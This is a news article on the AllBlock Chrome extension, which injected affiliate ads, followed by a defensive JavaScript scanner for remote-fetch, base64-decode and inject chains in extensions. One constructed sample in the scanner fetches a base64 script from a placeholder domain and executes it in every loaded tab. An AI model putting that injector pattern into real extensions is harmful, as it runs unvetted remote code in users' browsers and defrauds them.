AllBlock: Chrome Blocking Extension Injecting Illegal Ads


The AllBlock Chromium ad blocker, which worked as an extension to Google Chrome, was actually doing the exact opposite of the promised job: injecting hidden advertiser links, which generated commissions for the tool’s developers. The extension, which was available on the Chrome Web Store, was advertised as an ad blocker specializing in YouTube and Facebook.

Tracking since August a new set of malicious domains that freely distributed ad-injection code, cybersecurity company Imperva eventually found the malicious script in a “bg.gs” file (a name characteristic of Google Apps Script). Interestingly, the JavaScript snippet was “cloaked” among innocuous AllBlock variables.

The malware did not send the user to ad pages outright; instead, when legitimate URLs were opened, it redirected them to affiliate links controlled by the purported “blocker” developers. As a result, ads or links appeared on trusted web pages that normally do not host this type of advertising.

How does ad injection work?

Ad injection is the insertion of unwanted, unauthorized ads into a webpage that does not itself host them, so that a user who trusts the page ends up clicking on them. The operation is only profitable for scammers, who deceive users twice: once when the user installs a blocker that injects ads, and again when the user clicks on spurious ads that appear to be served by trusted pages.

Interestingly, AllBlock had excellent user reviews because its genuine ad-blocking functionality worked well. However, on every page load it contacted a URL hosted on the allblock.net website, which returned a base64-encoded script; the extension decoded the script and injected it into the page being viewed.
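The per-page-load behaviour just described (contact a remote URL, base64-decode the reply, inject it into the open page) is exactly the kind of chain a reviewer can look for statically in an unpacked extension before installing or approving it. The following is an added example, not code from the article or from the AllBlock extension: a small Node.js heuristic scanner that flags scripts combining a remote fetch, a base64 decode and a dynamic-execution sink, and lists the hosts each script contacts. The three sample scripts and the `example-extension.invalid` domain are constructed for this example; the regexes are deliberately simple heuristics, so treat "suspicious" as a prompt for manual review, not a verdict.

```javascript
// Added example (not from the article or the AllBlock project): a heuristic,
// offline scanner for the "fetch remote blob -> base64-decode -> inject into
// page" chain. Run it over the unpacked scripts of an extension under review.
// All sample scripts and domains below are constructed for this example.

const INDICATORS = {
  // Pulls content from a remote origin at runtime.
  remoteFetch: /\b(?:fetch|XMLHttpRequest|\$\.(?:ajax|get))\s*\(/,
  // Decodes base64 payloads.
  base64Decode: /\batob\s*\(|Buffer\.from\([^)]*["']base64["']\s*\)/,
  // Turns a string into executable code or page markup.
  dynamicExec: /\beval\s*\(|new\s+Function\s*\(|createElement\s*\(\s*["']script["']\s*\)|executeScript\s*\([^)]*\bcode\s*:|\.innerHTML\s*=|insertAdjacentHTML\s*\(/,
  // Fires on every page load / navigation (how the article says AllBlock triggered).
  pageLoadHook: /chrome\.tabs\.onUpdated|webNavigation\.on\w+|DOMContentLoaded/,
};

// The fetch -> decode -> execute chain is the injection pattern itself;
// the page-load hook only raises confidence, so it is not counted here.
const CORE = ["remoteFetch", "base64Decode", "dynamicExec"];

// Hosts the script talks to; compare them with the extension's stated purpose.
function remoteHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

function scanScript(name, source) {
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(source));
  const coreHits = hits.filter((k) => CORE.includes(k)).length;
  const verdict = coreHits === 3 ? "suspicious" : coreHits === 2 ? "review" : "clean";
  return { name, hits, hosts: remoteHosts(source), verdict };
}

// files: { "path/in/extension.js": "<source text>", ... }
function scanExtension(files) {
  return Object.entries(files).map(([name, src]) => scanScript(name, src));
}

// Constructed sample: a genuine CSS-only ad hider. Expected verdict: clean.
const BENIGN = `
document.addEventListener("DOMContentLoaded", () => {
  for (const el of document.querySelectorAll("[id^='ad-'], .sponsored")) {
    el.style.display = "none";
  }
});`;

// Constructed sample: remote HTML pasted into the popup. Expected: review.
const POPUP = `
fetch("https://api.example-extension.invalid/changelog")
  .then((r) => r.text())
  .then((html) => document.getElementById("news").insertAdjacentHTML("beforeend", html));`;

// Constructed sample: the chain the article attributes to AllBlock, with a
// placeholder domain. Expected: suspicious.
const INJECTOR = `
chrome.tabs.onUpdated.addListener((tabId, info) => {
  if (info.status !== "complete") return;
  fetch("https://cdn.example-extension.invalid/bg.gs")
    .then((r) => r.text())
    .then((b64) => chrome.tabs.executeScript(tabId, { code: atob(b64) }));
});`;

const SAMPLE_EXTENSION = {
  "content.js": BENIGN,
  "popup.js": POPUP,
  "background.js": INJECTOR,
};

for (const r of scanExtension(SAMPLE_EXTENSION)) {
  const hosts = r.hosts.length ? r.hosts.join(",") : "-";
  console.log(`${r.name}: ${r.verdict} [${r.hits.join(", ") || "no indicators"}] hosts=${hosts}`);
}
```

To use it on a real extension, read every `.js` file from the unpacked directory into the `files` object passed to `scanExtension` and review anything marked `review` or `suspicious` by hand, paying particular attention to contacted hosts that have nothing to do with the extension's advertised function. Minified or obfuscated bundles will evade regexes like these, which is itself a signal worth noting during review.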

Both the suspicious extension and web page are currently blocked.
